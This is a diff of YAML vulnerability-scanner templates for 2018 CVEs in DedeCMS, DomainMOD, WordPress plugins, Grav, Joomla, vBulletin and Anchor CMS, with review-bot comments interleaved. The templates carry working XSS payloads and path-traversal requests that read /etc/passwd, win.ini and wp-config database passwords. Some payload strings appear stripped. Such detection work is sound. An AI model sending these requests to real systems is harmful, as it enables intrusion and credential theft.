+ epss-score: 0.00177 + epss-percentile: 0.54825 + cpe: cpe:2.3:a:dedecms:dedecms:5.7:sp2:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: dedecms + product: dedecms shodan-query: http.html:"DedeCms" - verified: "true" tags: dedecms,xss,cve,cve2018 -requests: + +http: - method: GET path: - "{{BaseURL}}/plus/feedback.php/rp4hu%27>" - "DedeCMS Error Warning!" 
condition: and + - type: word part: header words: - text/html + - type: status status: - 200 +# digest: 4b0a00483046022100cf72a0f99d4ef20277ade314c91475ba279deec461e23dc12ff37f0824739383022100b0601d502d876a69456aba5ba214fc3189e4da3c72c99fd569c6e45e03c559b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-19752.yaml b/poc/cve/CVE-2018-19752.yaml index c93fd4dfd0..4876f6389a 100644 --- a/poc/cve/CVE-2018-19752.yaml +++ b/poc/cve/CVE-2018-19752.yaml @@ -1,33 +1,23 @@ id: CVE-2018-19752 - info: name: DomainMOD 4.11.01 - Cross-Site Scripting author: arafatansari severity: medium description: | - DomainMOD through 4.11.01 contains a cross-site scripting vulnerability via the assets/add/registrar.php notes field for Registrar. - remediation: | - Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. + DomainMOD through 4.11.01 has XSS via the assets/add/registrar.php notes,registrar field. reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-19752 - https://github.com/domainmod/domainmod/issues/84 - https://www.exploit-db.com/exploits/45949/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-19752 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2018-19752 cwe-id: CWE-79 - epss-score: 0.00096 - epss-percentile: 0.39994 - cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: - verified: true - max-request: 3 - vendor: domainmod - product: domainmod - tags: cve,cve2018,domainmod,xss,authenticated,edb - -http: + verified: "true" + tags: cve,cve2018,domainmod,xss,authenticated +requests: - raw: - | POST / HTTP/1.1 
@@ -44,23 +34,19 @@ http: - | GET /assets/registrars.php HTTP/1.1 Host: {{Hostname}} - - host-redirects: true + cookie-reuse: true + redirects: true max-redirects: 2 - matchers-condition: and matchers: - type: word part: body words: - '">' - - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 4b0a004830460221009072657a99210938964ec568821cc0e778ad43fc14982d266dc8d86f6410796e022100d0f238aeadc144c7fa99f7bde229ac1c8d4b125d771c634cc8dfd8427e4ec9b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-19877.yaml b/poc/cve/CVE-2018-19877.yaml index 0499aa736c..1a7a7645d2 100644 --- a/poc/cve/CVE-2018-19877.yaml +++ b/poc/cve/CVE-2018-19877.yaml 
@@ -1,50 +1,35 @@ id: CVE-2018-19877 - info: - name: Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting + name: Adiscon LogAnalyzer 4.1.7 - Cross Site Scripting author: arafatansari severity: medium description: | - Adiscon LogAnalyzer before 4.1.7 contains a cross-site scripting vulnerability in the 'referer' parameter of the login.php file. - remediation: | - Upgrade Adiscon LogAnalyzer to version 4.1.7 or later to mitigate this vulnerability. + Adiscon LogAnalyzer before 4.1.7 is affected by Cross-Site Scripting (XSS) in the 'referer' parameter of the login.php file. reference: - https://loganalyzer.adiscon.com/news/loganalyzer-v4-1-7-v4-stable-released/ - https://www.exploit-db.com/exploits/45958/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-19877 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-19877 cwe-id: CWE-79 - epss-score: 0.00241 - epss-percentile: 0.61992 - cpe: cpe:2.3:a:adiscon:loganalyzer:*:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: adiscon - product: loganalyzer - tags: adiscon,xss,edb,cve,cve2018 - -http: + verified: "true" + tags: cve,cve2018,adiscon,xss +requests: - method: GET path: - "{{BaseURL}}/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E" - matchers-condition: and matchers: - type: word part: body words: - 'value="">' - - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 4b0a0048304602210080774383cb9e8861a3c0c9fa89f24ff791992772b83a7222a7ed6a682798df51022100898df70370395c6450bb0ff0f67665661c3b54c9ad9dc7cde6cc21fdc668c9c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-20010.yaml b/poc/cve/CVE-2018-20010.yaml index 451bb6c471..ca5de31180 100644 --- a/poc/cve/CVE-2018-20010.yaml +++ b/poc/cve/CVE-2018-20010.yaml 
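Review bot: The new `name: Adiscon LogAnalyzer 4.1.7 - Cross Site Scripting` presents 4.1.7 as the affected version, while the description in the same hunk says the issue affects releases before 4.1.7. The first reference is the 4.1.7 release announcement, so the name appears to label the fixed release as vulnerable. Reports generated from the template name would then send remediation toward the wrong version. I would keep the range marker, `name: Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting`, and restore the NVD reference that this hunk drops.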
@@ -1,33 +1,23 @@ id: CVE-2018-20010 - info: name: DomainMOD 4.11.01 - Cross-Site Scripting author: arafatansari severity: medium description: | - DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider-account.php Username field. - remediation: | - Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. + DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /assets/add/ssl-provider-account.php Username field. reference: - https://www.exploit-db.com/exploits/46373/ - - https://github.com/domainmod/domainmod/issues/88 - https://nvd.nist.gov/vuln/detail/CVE-2018-20010 + - https://github.com/domainmod/domainmod/issues/88 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2018-20010 cwe-id: CWE-79 - epss-score: 0.00153 - epss-percentile: 0.51562 - cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true - max-request: 3 - vendor: domainmod - product: domainmod - tags: domainmod,xss,authenticated,edb,cve,cve2018 - -http: + tags: cve,cve2018,domainmod,xss,authenticated +requests: - raw: - | POST / HTTP/1.1 @@ -44,14 +34,14 @@ http: - | GET /assets/ssl-accounts.php HTTP/1.1 Host: {{Hostname}} - - host-redirects: true + cookie-reuse: true + redirects: true max-redirects: 2 + req-condition: true matchers: - type: dsl dsl: - 'status_code_3 == 200' - - 'contains(header_3, "text/html")' + - 'contains(all_headers_3, "text/html")' - 'contains(body_3, ">")' condition: and -# digest: 490a0046304402201798939eca8555be5e6b817622174e9a0310f12a3c3133646957b3f4760ee5d4022072057a2af63fd3098fd664b0f8dee89e81614783412d16ff09e09fd7cb6bfd79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-20011.yaml b/poc/cve/CVE-2018-20011.yaml index b48e1aa0cb..7dbb653583 100644 --- a/poc/cve/CVE-2018-20011.yaml +++ b/poc/cve/CVE-2018-20011.yaml 
@@ -1,10 +1,13 @@ id: CVE-2018-20011 + info: name: DomainMOD 4.11.01 - Cross-Site Scripting author: arafatansari severity: medium description: | - DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /assets/add/category.php CatagoryName, StakeHolder parameters. + DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/category.php CatagoryName and StakeHolder parameters. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/46374/ - https://github.com/domainmod/domainmod/issues/88 @@ -14,10 +17,17 @@ info: cvss-score: 4.8 cve-id: CVE-2018-20011 cwe-id: CWE-79 + epss-score: 0.00153 + epss-percentile: 0.51562 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true - tags: cve,cve1028,domainmod,xss,authenticated -requests: + max-request: 3 + vendor: domainmod + product: domainmod + tags: domainmod,xss,authenticated,edb,cve,cve1028 + +http: - raw: - | POST / HTTP/1.1 @@ -34,14 +44,14 @@ requests: - | GET /assets/categories.php HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true - redirects: true + + host-redirects: true max-redirects: 2 - req-condition: true matchers: - type: dsl dsl: - 'status_code_3 == 200' - - 'contains(all_headers_3, "text/html")' + - 'contains(header_3, "text/html")' - 'contains(body_3, ">")' condition: and +# digest: 490a0046304402206dfbf9ca4512470bc41d683d099e0825233aa96201f5206a6c3c5fa163a5681a022077979f25c381fe88c84afe65efaa253fcce9009b98bba05c388f43e13f42b7f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-20462.yaml b/poc/cve/CVE-2018-20462.yaml index 382e9a0626..fa78623265 100644 --- a/poc/cve/CVE-2018-20462.yaml +++ b/poc/cve/CVE-2018-20462.yaml 
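Review bot: The rewritten tags line still carries `cve1028`, which looks like a typo for `cve2018`: `tags: domainmod,xss,authenticated,edb,cve,cve1028`. A scan or report that selects by the year tag will skip this template, unlike the sibling DomainMOD template CVE-2018-20010 in this commit, which uses `cve2018`. I would change the line to `tags: domainmod,xss,authenticated,edb,cve,cve2018`.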
@@ -1,33 +1,19 @@ id: CVE-2018-20462 info: - name: WordPress JSmol2WP <=1.07 - Cross-Site Scripting + name: JSmol2WP <= 1.07 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - description: WordPress JSmol2WP version 1.07 and earlier is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter. - remediation: | - Update to the latest version of the WordPress JSmol2WP plugin (1.08 or higher) to mitigate this vulnerability. - reference: - - https://github.com/sullo/advisory-archives/blob/master/wordpress-jsmol2wp-CVE-2018-20463-CVE-2018-20462.txt - - https://wpvulndb.com/vulnerabilities/9196 - - https://nvd.nist.gov/vuln/detail/CVE-2018-20462 - - https://www.cbiu.cc/2018/12/WordPress%E6%8F%92%E4%BB%B6jsmol2wp%E6%BC%8F%E6%B4%9E/#%E5%8F%8D%E5%B0%84%E6%80%A7XSS + description: An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. A cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-20462 + tags: cve,cve2018,wordpress,xss,wp-plugin classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2018-20462 cwe-id: CWE-79 - epss-score: 0.00245 - epss-percentile: 0.62379 - cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: jsmol2wp_project - product: jsmol2wp - framework: wordpress - tags: cve,cve2018,wordpress,xss,wp-plugin -http: +requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8' @@ -35,9 +21,9 @@ http: matchers-condition: and matchers: - type: word - part: body words: - "" + part: body - type: word part: header 
@@ -47,4 +33,3 @@ http: - type: status status: - 200 -# digest: 490a0046304402206c6f023187230db2b448f76706c6765d299e0ea9caa8bf2a319363df9dcd0f730220572b1af78f7382e75b8fc72538678d35af0741d92e81ff4a64bedc341670a1ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-20470.yaml b/poc/cve/CVE-2018-20470.yaml index a9bc920b84..913e599c3a 100644 --- a/poc/cve/CVE-2018-20470.yaml +++ b/poc/cve/CVE-2018-20470.yaml @@ -6,33 +6,25 @@ info: severity: high description: | Tyto Sahi Pro versions through 7.x.x and 8.0.0 are susceptible to a local file inclusion vulnerability in the web reports module which can allow an outside attacker to view contents of sensitive files. - remediation: | - Apply the latest security patches or upgrade to a patched version of Tyto Sahi pro. reference: - https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/ - http://packetstormsecurity.com/files/153330/Sahi-Pro-7.x-8.x-Directory-Traversal.html - https://nvd.nist.gov/vuln/detail/CVE-2018-20470 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-20470 cwe-id: CWE-22 - epss-score: 0.67359 - epss-percentile: 0.97629 - cpe: cpe:2.3:a:sahipro:sahi_pro:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: sahipro - product: sahi_pro - tags: cve,cve2018,lfi,packetstorm + tags: cve,cve2018,lfi -http: +requests: - method: GET path: - "{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected" matchers-condition: and matchers: + - type: word part: body words: @@ -44,4 +36,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203e3562bb4fe1bddb9ba99514b494171ef26490ee71554aecf8bbbfc6a1cca962022100f669e40d43acc671d1ee23c3b308a39c3e62b05b54992737ad5b9eb31e9a11f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# Enhanced by mp on 2022/06/17 
diff --git a/poc/cve/CVE-2018-20985.yaml b/poc/cve/CVE-2018-20985.yaml index abd9853113..c641ac61ca 100644 --- a/poc/cve/CVE-2018-20985.yaml +++ b/poc/cve/CVE-2018-20985.yaml 
@@ -1,49 +1,35 @@ id: CVE-2018-20985 - info: name: WordPress Payeezy Pay <=2.97 - Local File Inclusion author: daffainfo severity: critical description: WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected. - remediation: | - Update to the latest version of WordPress Payeezy Pay plugin. reference: - https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/ - https://wordpress.org/plugins/wp-payeezy-pay/#developers - - https://nvd.nist.gov/vuln/detail/CVE-2018-20985 + - https://www.cvedetails.com/cve/CVE-2018-20985/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-20985 cwe-id: CWE-20 - epss-score: 0.01138 - epss-percentile: 0.83095 - cpe: cpe:2.3:a:payeezy:wp_payeezy_pay:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: payeezy - product: wp_payeezy_pay - framework: wordpress tags: cve,cve2018,wordpress,lfi,plugin - -http: +requests: - method: POST path: - "{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php" - body: "x_login=../../../wp-config" - matchers-condition: and matchers: - type: word - part: body words: - "The base configuration for WordPress" - "define( 'DB_NAME'," - "define( 'DB_PASSWORD'," condition: and - + part: body - type: status status: - 200 -# digest: 4a0a00473045022100ad5923e4d293095c47baad33b7d259a0d3079206362281205d657f352d4a11de02207be330f31dfdbbc1ff13ab9d93ab64e32adb517d99f9b65a62ab7e4c99a319d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/05/13 
diff --git a/poc/cve/CVE-2018-5233.yaml b/poc/cve/CVE-2018-5233.yaml
index 549a61109c..8233b5cde4 100644
--- a/poc/cve/CVE-2018-5233.yaml
+++ b/poc/cve/CVE-2018-5233.yaml
@@ -1,58 +1,34 @@ id: CVE-2018-5233 - info: - name: Grav CMS <1.3.0 - Cross-Site Scripting + name: Grav CMS before 1.3.0 allows XSS. author: pikpikcu severity: medium description: | - Grav CMS before 1.3.0 is vulnerable to cross-site scripting via system/src/Grav/Common/Twig/Twig.php and allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to admin/tools. - remediation: | - Upgrade Grav CMS to version 1.3.0 or later, which includes proper input sanitization to mitigate the XSS vulnerability. + Cross-site scripting (XSS) vulnerability in system/src/Grav/Common/Twig/Twig.php in Grav CMS before 1.3.0 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to admin/tools. reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-5233 - https://sysdream.com/news/lab/2018-03-15-cve-2018-5233-grav-cms-admin-plugin-reflected-cross-site-scripting-xss-vulnerability/ - http://www.openwall.com/lists/oss-security/2018/03/15/1 - - https://nvd.nist.gov/vuln/detail/CVE-2018-5233 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-5233 cwe-id: CWE-79 - epss-score: 0.00295 - epss-percentile: 0.65927 - cpe: cpe:2.3:a:getgrav:grav_cms:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: getgrav - product: grav_cms - shodan-query: html:"Grav CMS" tags: cve,cve2018,xss,grav - -http: +requests: - method: GET path: - "{{BaseURL}}/admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and matchers: - type: word - part: body words: - '' - - - type: word part: body - words: - - '/themes/grav' - - 'Grav Admin Login' - - 'data-grav-' - condition: or - + - type: status + status: + - 200 - type: word part: header words: - text/html - - - type: status - status: - - 200 -# digest: 
490a0046304402200848c0e3bbbc37663cc87529b1df06095f6739ecd4b4ba46f3b3712e6210218302207a163a02bf5fb8d4d81d1f63374e9b20f26ece02133dcca828ce64c2229a21ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-5316.yaml b/poc/cve/CVE-2018-5316.yaml index 975724f566..3e41bc36b8 100644 --- a/poc/cve/CVE-2018-5316.yaml +++ b/poc/cve/CVE-2018-5316.yaml 
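Review bot: Removing the second body matcher (`/themes/grav`, `Grav Admin Login`, `data-grav-`) from CVE-2018-5233.yaml leaves the template firing on any `text/html` 200 response that reflects the payload, whether or not the host runs Grav, so defenders will have more false positives to triage. I would restore the product fingerprint as its own `word` matcher under the existing `matchers-condition: and`, as in the fence below. The remaining payload word shows as `''` in this view, presumably because the markup was stripped in rendering; if the file really holds an empty word it would match every body, so it is worth checking.

```yaml
    matchers:
      # … unchanged: payload word matcher, status and header matchers …
      - type: word
        part: body
        words:
          - '/themes/grav'
          - 'Grav Admin Login'
          - 'data-grav-'
        condition: or
```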
@@ -1,29 +1,46 @@ id: CVE-2018-5316 info: - name: SagePay Server Gateway for WooCommerce <= 1.0.8 - Reflected Cross-Site Scripting (XSS) + name: WordPress SagePay Server Gateway for WooCommerce <1.0.9 - Cross-Site Scripting author: daffainfo severity: medium - description: The SagePay Server Gateway for WooCommerce plugin before 1.0.9 for WordPress has XSS via the includes/pages/redirect.php page parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5316 - tags: cve,cve2018,wordpress,xss,wp-plugin,woocommerce + description: WordPress SagePay Server Gateway for WooCommerce before 1.0.9 is vulnerable to cross-site scripting via the includes/pages/redirect.php page parameter. + remediation: | + Update to the latest version of the WordPress SagePay Server Gateway for WooCommerce plugin (1.0.9 or higher) to mitigate this vulnerability. + reference: + - https://wordpress.org/support/topic/sagepay-server-gateway-for-woocommerce-1-0-7-cross-site-scripting/#post-9792337 + - https://wordpress.org/plugins/sagepay-server-gateway-for-woocommerce/#developers + - https://packetstormsecurity.com/files/145459/WordPress-Sagepay-Server-Gateway-For-WooCommerce-1.0.7-XSS.html + - https://nvd.nist.gov/vuln/detail/CVE-2018-5316 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2018-5316 cwe-id: CWE-79 + epss-score: 0.00175 + epss-percentile: 0.54607 + cpe: cpe:2.3:a:patsatech:sagepay_server_gateway_for_woocommerce:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 1 + vendor: patsatech + product: sagepay_server_gateway_for_woocommerce + framework: wordpress + tags: cve2018,wordpress,xss,wp-plugin,wp,woocommerce,packetstorm,cve -requests: +http: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - 
'{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=">' matchers-condition: and matchers: - type: word - words: - - "" part: body + words: + - '">' + - 'Authenticate your card' + condition: and - type: word part: header @@ -33,3 +50,4 @@ requests: - type: status status: - 200 +# digest: 4a0a0047304502207ffbf93ef0b212248a5815daab670c60ab6db91e300e26f1a7fef7604c3419bd022100fe77297109b14e59e64d87a6da363c5cb4dc19df7c163ca7d78d69fb01ed2550:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-6008.yaml b/poc/cve/CVE-2018-6008.yaml index 1e302599a3..149bee1fb6 100644 --- a/poc/cve/CVE-2018-6008.yaml +++ b/poc/cve/CVE-2018-6008.yaml @@ -5,9 +5,10 @@ info: author: daffainfo severity: high description: Joomla! Jtag Members Directory 5.3.7 is vulnerable to local file inclusion via the download_file parameter. + remediation: | + Update Joomla! Jtag Members Directory to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/43913 - - https://www.cvedetails.com/cve/CVE-2018-6008 - https://packetstormsecurity.com/files/146137/Joomla-Jtag-Members-Directory-5.3.7-Arbitrary-File-Download.html - https://nvd.nist.gov/vuln/detail/CVE-2018-6008 classification: @@ -15,16 +16,23 @@ info: cvss-score: 7.5 cve-id: CVE-2018-6008 cwe-id: CWE-200 - tags: cve,cve2018,joomla,lfi + epss-score: 0.3768 + epss-percentile: 0.96837 + cpe: cpe:2.3:a:joomlatag:jtag_members_directory:5.3.7:*:*:*:*:joomla\!:*:* + metadata: + max-request: 1 + vendor: joomlatag + product: jtag_members_directory + framework: joomla\! + tags: cve,cve2018,joomla,lfi,edb,packetstorm -requests: +http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd" matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" 
@@ -33,4 +41,4 @@ requests: status: - 200 -# Enhanced by mp on 2022/07/08 +# digest: 4a0a004730450220520e4c98bcf1f63e20b1f860bc6682887d2a900026825a680bffbaac6ecdb7e8022100e0cacd270cb2c119c285f02df0fbe0b52875b90093b5b53befe56fcc0ac1e34d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2018-6200.yaml b/poc/cve/CVE-2018-6200.yaml index 717531116b..feaf1462b9 100644 --- a/poc/cve/CVE-2018-6200.yaml +++ b/poc/cve/CVE-2018-6200.yaml 
@@ -1,45 +1,32 @@ id: CVE-2018-6200 - info: - name: vBulletin - Open Redirect + name: vBulletin 3.x.x & 4.2.x - Open Redirect author: 0x_Akoko,daffainfo severity: medium description: | - vBulletin 3.x.x and 4.2.x through 4.2.5 contains an open redirect vulnerability via the redirector.php URL parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - remediation: | - Apply the latest security patches and updates provided by vBulletin to fix the open redirect vulnerability. + vBulletin 3.x.x and 4.2.x through 4.2.5 has an open redirect via the redirector.php url parameter. reference: - https://cxsecurity.com/issue/WLB-2018010251 - - https://nvd.nist.gov/vuln/detail/CVE-2018-6200 + - https://www.cvedetails.com/cve/CVE-2018-6200 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-6200 cwe-id: CWE-601 - epss-score: 0.00118 - epss-percentile: 0.45709 - cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* metadata: verified: true - max-request: 2 - vendor: vbulletin - product: vbulletin tags: cve,cve2018,redirect,vbulletin - -http: +requests: - method: GET path: - '{{BaseURL}}/redirector.php?url=https://interact.sh' - '{{BaseURL}}/redirector.php?do=nodelay&url=https://interact.sh' - matchers-condition: and matchers: - type: word part: body words: - '' - - type: status status: - 200 -# digest: 4a0a00473045022100a687baa1d283d98366044986b649541d6105d9082908e9db2407e175dded3d08022019caf24c4d237e42c9453d7ea6e43e26ac90f7232c73b8b37e8a7eb7cd0b236d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-6910.yaml b/poc/cve/CVE-2018-6910.yaml index 0517017275..19771b7880 100644 --- a/poc/cve/CVE-2018-6910.yaml +++ b/poc/cve/CVE-2018-6910.yaml 
@@ -1,9 +1,12 @@ id: CVE-2018-6910 + info: - name: DedeCMS 5.7 path disclosure + name: DedeCMS 5.7 - Path Disclosure author: pikpikcu severity: high description: DedeCMS 5.7 allows remote attackers to discover the full path via a direct request for include/downmix.inc.php or inc/inc_archives_functions.php + remediation: | + Apply the latest patch or upgrade to a newer version of DedeCMS to fix the path disclosure vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-6910 - https://github.com/kongxin520/DedeCMS/blob/master/DedeCMS_5.7_Bug.md @@ -13,19 +16,30 @@ info: cvss-score: 7.5 cve-id: CVE-2018-6910 cwe-id: CWE-668 + epss-score: 0.03394 + epss-percentile: 0.90397 + cpe: cpe:2.3:a:dedecms:dedecms:5.7:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: dedecms + product: dedecms tags: cve,cve2018,dedecms -requests: + +http: - method: GET path: - "{{BaseURL}}/include/downmix.inc.php" + matchers-condition: and matchers: - type: word + part: body words: - "downmix.inc.php" - "Call to undefined function helper()" - part: body condition: and + - type: status status: - 200 +# digest: 490a0046304402206cce07f47c64ba2b080e9307d96831d00f4b72845c216b637f478acfbf0bf315022031196b26556404b43ebfec71bff4db8c39bf22043ae63fe31e329d82e620995f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-7251.yaml b/poc/cve/CVE-2018-7251.yaml index b028397308..17ebdb1a9e 100644 --- a/poc/cve/CVE-2018-7251.yaml +++ b/poc/cve/CVE-2018-7251.yaml 
@@ -1,38 +1,27 @@ id: CVE-2018-7251 info: - name: Anchor CMS 0.12.3 - Error Log Exposure + name: AnchorCMS Error Log Exposure author: pdteam severity: critical - description: | - Anchor CMS 0.12.3 is susceptible to an error log exposure vulnerability due to an issue in config/error.php. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as "Too many connections") has occurred. - remediation: | - Upgrade to the latest version of Anchor CMS or apply the necessary patches to fix the error log exposure vulnerability. + tags: cve,cve2018,anchorcms,logs,error + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-7251 + cwe-id: CWE-200 + description: "An issue was discovered in config/error.php in Anchor 0.12.3. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as \"Too many connections\") has occurred." reference: - https://github.com/anchorcms/anchor-cms/issues/1247 + - http://www.andmp.com/2018/02/advisory-assigned-CVE-2018-7251-in-anchorcms.html - https://twitter.com/finnwea/status/965279233030393856 - http://packetstormsecurity.com/files/154723/Anchor-CMS-0.12.3a-Information-Disclosure.html - https://github.com/anchorcms/anchor-cms/releases/tag/0.12.7 - - https://nvd.nist.gov/vuln/detail/CVE-2018-7251 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2018-7251 - cwe-id: CWE-200 - epss-score: 0.06473 - epss-percentile: 0.92967 - cpe: cpe:2.3:a:anchorcms:anchor:0.12.3:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: anchorcms - product: anchor - tags: cve,cve2018,anchorcms,logs,error,packetstorm -http: +requests: - method: GET path: - '{{BaseURL}}/anchor/errors.log' - matchers: - type: word words: 
@@ -40,4 +29,3 @@ http: - '"message":' - '"trace":[' condition: and -# digest: 4b0a00483046022100dadbd37e825fce9607c3b308832c2ce7fa5055e72fa42d1d30039519713001e2022100df39665f3d0168e3250ddba29c5a8c3231fddac4a0bac13cc0fd5fc8c963779e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-7467.yaml b/poc/cve/CVE-2018-7467.yaml index 209cbb7767..22b15a68ee 100644 --- a/poc/cve/CVE-2018-7467.yaml +++ b/poc/cve/CVE-2018-7467.yaml @@ -1,20 +1,32 @@ id: CVE-2018-7467 + info: - name: AxxonSoft Axxon Next Directory Traversal + name: AxxonSoft Axxon Next - Local File Inclusion author: 0x_Akoko severity: high - description: AxxonSoft Axxon Next suffers from a directory traversal vulnerability. + description: AxxonSoft Axxon Next suffers from a local file inclusion vulnerability. + remediation: | + Apply the latest security patches or updates provided by AxxonSoft to fix the local file inclusion vulnerability. reference: - https://packetstormsecurity.com/files/146604/AxxonSoft-Axxon-Next-Directory-Traversal.html + - https://github.com/sullo/advisory-archives/blob/master/axxonsoft-next-CVE-2018-7467.txt - https://nvd.nist.gov/vuln/detail/CVE-2018-7467 - 